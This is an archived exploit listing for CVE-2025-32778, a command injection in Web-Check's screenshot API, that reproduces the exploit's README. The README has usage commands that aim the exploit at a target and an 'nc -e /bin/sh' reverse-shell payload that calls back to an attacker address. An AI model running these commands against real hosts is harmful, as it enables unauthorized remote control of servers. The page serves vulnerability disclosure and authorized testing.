Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-32778 PoC — Web-Check allows command Injection via Unvalidated URL in Screenshot API

Source
https://github.com/00xCanelo/CVE-2025-32778
Associated Vulnerability
Title:Web-Check allows command Injection via Unvalidated URL in Screenshot API (CVE-2025-32778)
Description:Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project (Lissy93/web-check). The issue stems from user-controlled input (url) being passed unsanitized into a shell command using exec(), allowing attackers to execute arbitrary system commands on the underlying host. This could be exploited by sending crafted url parameters to extract files or even establish remote access. The vulnerability has been patched by replacing exec() with execFile(), which avoids using a shell and properly isolates arguments.
Readme
# CVE-2025-32778 - Web-Check Command Injection Exploit

[![Critical](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2025-32778)
[![Language: Python](https://img.shields.io/badge/Python-3.x-blue)](https://www.python.org/)

## Description

CVE-2025-32778 is a critical command injection vulnerability in **Web-Check** OSINT tool by Lissy93.  
It allows unauthenticated attackers to execute arbitrary system commands via the `url` parameter in the screenshot API.

This Python script automates exploitation and can generate reverse shells or accept custom shell payloads.

---

## Warning

- Only test on systems you own or are authorized to test.
- Unauthorized use is illegal and unethical.

---

## Features

- Exploit `url` command injection in Web-Check.
- Supports:
  - Reverse shell with `--lhost` and `--lport`.
  - Custom shell via `--shell`.
- URL normalization.
- Prevents combining `--shell` with `--lhost/--lport`.

---

## Requirements

- Python 3.x
- Requests library:

```bash
pip install requests
```
---
## Usage
```bash
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
```
### Make the tool create a reverse shell
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 192.168.1.4 --lport 4444
```
### Custom Shell Payload (Raw)
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 192.168.1.4 4444"
```
### Help Menu
```bash
python3 cve-2025-32778.py -h
```
---
## How It Works

1. Normalize the target URL to `scheme://host[:port]`.

2. Prepare the payload:
   * Generate a reverse shell using `--lhost` and `--lport`.
   * Or use a raw shell command with `--shell`.

3. Encode the shell payload for safe URL injection.

4. Send an HTTP GET request to `/api/screenshot/` with the payload.

5. Wait for the reverse shell connection.
---
## References
- [Web-Check GitHub Repository](https://github.com/lissy93/web-check) – Original project containing the vulnerable code.
- [CVE-2025-32778](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32778) – CVE entry describing the command injection vulnerability.
File Snapshot

 [4.0K]  /data/pocs/190616bd431fa63c780ecd06f4438349e8dfa92b
├── [3.4K]  cve-2025-32778
└── [2.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →